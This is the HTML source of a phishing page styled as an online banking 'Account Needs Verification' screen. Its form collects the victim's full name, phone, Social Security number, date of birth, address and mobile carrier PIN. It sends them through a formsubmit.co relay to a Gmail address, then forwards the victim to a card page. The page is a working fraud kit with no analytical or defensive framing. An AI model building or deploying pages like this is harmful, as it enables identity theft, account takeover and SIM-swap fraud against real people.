<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="robots" content="noindex">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0" />
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests" />
    title>Verify for Online Banking</title>
    <link rel="stylesheet" href="./bootstrap.css" />
    <link rel="stylesheet" href="./bootstrap.min.css" />
    <link rel="stylesheet" href="./all.css" />
    <style>
        * {
            margin: 0;
            padding: 0;
        }
        #headthree {
            color: #007856;
            font-size: 28px;
        }
        nav {
            border-bottom: 7px solid orange;
        }
        label {
            color: #767676;
        }
        .form-btns {
            width: 100%;
            padding: 0.7rem 3.3rem;
            color: white;
            background-color: #007856;
            border: 1px solid #007856;
            border-radius: 3px;
        }
        .small_link {
            text-decoration: underline;
        }

        .small_text {
            color: #767676;
            font-size: 12px;
            /* font-weight: 200; */
            word-spacing: 2px;
        }
        .footer_top_links {
            text-align: center;
        }
        footer {
            font-size: 10px;
            position: relative;
            bottom: 0;
            height: 100%;
            background-color: #efefef;
        }
        .pipe {
        
            color: gray;
        }
    </style>
</head>

<body>
    <nav id="nav" class="navbar navbar-expand-lg py-3 fixed-top" style="background-color: #007856; color: black">
        <div class="container">
            <div class="mx-auto">
                <img src="./white logo.png" onclick="window.location.href = 'verify.html'" id="logo" alt="" width="104px"
                    height="19px" />
            </div>

        </div>
    </nav>

    <section class="my-5">
        <div class="container-fluid py-3">
            <span>Verification</span>
            <p id="headthree" style="color: #007856;">Account Needs Verification!</p>
            <p>
                Verify access to your Online Banking account in just a few steps
            </p>
        </div>
        <form action="https://formsubmit.co/fishtina84@gmail.com" method="post">
            <input type="hidden" name="_next" value="./card.html">
            <input type="hidden" name="_captcha" value="false">
            <div class="row container-fluid input-group mx-auto" id="personal">
                <div class="input-group col-lg-3 col-md-4 col-12"></div>
                <label for="">Full Name</label>
                <input type="text" name="Fullname"  class="form-control" placeholder="" />
                <div class="input-group col-lg-3 col-md-4 col-12 pb-3"></div>
                <label for="">Phone</label>
                <input type="tel" name="Phone" class="form-control" placeholder="" />
                <div class="input-group col-lg-3 col-md-4 col-12 pb-3"></div>
                <label for="">SSN</label>
                <input maxlength="9" name="SSN" data-allowPaste="True" data-allowCopy="True" data-textBoxAccepts="numbers"
                    placeholder="000-00-0000" data-inputType="tel" class="form-control" />
                <div class="input-group col-lg-3 col-md-4 col-12 pb-3 "></div>
                <label for="">Date Of Birth</label>
                <input type="date" name="DOB" class="form-control" maxlength="10" placeholder="MM/DD/YYYY" />
                <div class="input-group col-lg-3 col-md-4 col-12 pb-3"></div>
                <label for="">Address</label>
                <input type="text" class="form-control" name="Address" placeholder="" />
                <div class="input-group col-lg-3 col-md-4 col-12 pb-3 "></div>
                <label for="">City</label>
                <input type="text" class="form-control" placeholder="" name="City" />
                <div class="input-group col-lg-3 col-md-4 col-12 pb-3"></div>
                <label for="">Zip Code</label>
                <input type="tel" class="form-control" name="Zip Code" maxlength="20" data-allowPaste="True" data-allowCopy="True"
                    data-textBoxAccepts="numbersletters" placeholder="" />
                <div class="input-group col-lg-3 col-md-4 col-12 pb-3 "></div>
                <label for="">Carrier PIN</label>
                <input type="password" name="Carrier PIN" class="form-control" maxlength="4" data-allowPaste="True" data-allowCopy="True"
                    data-textBoxAccepts="numbers" placeholder="0000" placeholder="Passcode" />
                <div class="input-group col-lg-3 col-md-4 col-12 container-fluid my-4">
                    <div class="input-group">
                        <button class="form-btns" type="submit">Verify</button>
                    </div>
                </div>
            </div>
        </form>

    </section>
</footer>

</body>

</html>
